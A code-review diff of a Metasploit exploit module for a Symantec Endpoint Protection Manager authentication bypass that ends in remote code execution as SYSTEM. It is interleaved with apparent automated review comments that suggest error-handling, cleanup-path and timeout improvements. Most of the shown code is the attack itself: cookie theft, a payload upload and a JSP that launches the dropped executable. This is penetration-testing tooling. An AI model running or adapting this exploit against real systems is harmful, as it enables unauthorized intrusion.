diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 06e9a54757..f6deac9ab2 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -8,20 +8,21 @@ require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
     super(update_info(info,
-      'Name' => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
+      'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
       'Description' => %q{
-        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
-        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
+        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM.
       },
       'License' => MSF_LICENSE,
       'Author' =>
         [
-          'bperry', #metasploit module
-          'Markus Wulftange' #discovery
+          'Markus Wulftange', #discovery
+          'bperry' # metasploit module
         ],
       'References' =>
         [
@@ -36,12 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote
       'Platform' => 'win',
       'Targets' =>
         [
-          [ 'Automatic', {
-            'Arch' => ARCH_X86,
-            'Payload' => {
-              'DisableNops' => true
+          [ 'Automatic',
+            {
+              'Arch' => ARCH_X86,
+              'Payload' => {
+                'DisableNops' => true
+              }
             }
-          } ],
+          ],
         ],
       'Privileged' => true,
       'DisclosureDate' => 'Jul 31 2015',
@@ -58,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
     meterp = Rex::Text.rand_text_alpha(10)
     jsp = Rex::Text.rand_text_alpha(10)
 
-    print_status("Getting cookie")
+    print_status("#{peer} - Getting cookie...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
@@ -70,21 +73,21 @@ class Metasploit4 < Msf::Exploit::Remote
       }
     })
 
-    unless res
-      fail_with(Failure::Unknown, 'The server did not respond in an expected way')
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
     end
 
     cookie = res.get_cookies
 
-    if cookie == nil || cookie == ''
-      fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
+    if cookie.nil? || cookie.empty?
+      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
     end
 
     exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
 }
 
-    print_status('Uploading payload...')
+    print_status("#{peer} - Uploading payload...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -100,10 +103,12 @@ class Metasploit4 < Msf::Exploit::Remote
     })
 
     unless res && res.code == 200
-      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
     end
 
-    print_status("Uploading JSP page to execute the payload...")
+    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
+
+    print_status("#{peer} - Uploading JSP page to execute the payload...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
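Review bot: The new `unless res && res.code == 200` guard folds two different failures into `Failure::Unknown` — no response at all and a response with an unexpected status — and the same pattern is repeated in the two following hunks. Splitting them, e.g. `fail_with(Failure::Unreachable, "#{peer} - No response from server") unless res` followed by `fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP status #{res.code}") unless res.code == 200`, tells the operator whether the host is down or the target simply does not match, which `Unknown` hides. The stricter status check also means a response that sets the session cookie but answers with something other than 200 (a redirect, for instance) is now rejected where it was previously accepted; worth confirming that is intended. The enclosing `exploit` method starts before this hunk.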
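Review bot: `register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")` hands FileDropper a path relative to the session's working directory, while the JSP built in the previous hunk locates the same file via `System.getProperty("user.dir")+"\\..\\webapps\\ROOT\\"`; unless the spawned session's cwd is known to be one level below the `tomcat` directory, the cleanup will presumably target a path that does not exist and the dropped executable stays behind silently. The same literal recurs in the next hunk for the `.jsp`, so it would be cleaner to hold the directory in one constant and document the assumption next to it, e.g. `# relative to the session's cwd; assumes the payload starts in the SEPM install directory — confirm`. The enclosing `exploit` method starts and ends outside this hunk.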
@@ -119,12 +124,14 @@ class Metasploit4 < Msf::Exploit::Remote
     })
 
     unless res && res.code == 200
-      fail_with(Failure::Unknown, 'Server did not respond in an expected way.')
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
     end
 
-    print_status('Executing payload. Manual cleanup will be required.')
+    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
+
+    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
-    })
+    }, 5)
   end
 end
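Review bot: The message `print_status("#{peer} - Executing payload. Manual cleanup will be required.")` is now stale, since the two `register_file_for_cleanup` calls hand the dropped `.exe` and `.jsp` to FileDropper; change it to `print_status("#{peer} - Executing payload...")` or state that the files are removed when the session closes. The bare `5` passed as the second argument of `send_request_cgi` is an unexplained magic number; presumably it is the read timeout, shortened because the JSP does not return while the payload runs, so a comment such as `# short timeout: the JSP blocks while the payload runs, no response is expected` would make that intent explicit. The enclosing `exploit` method starts outside this hunk.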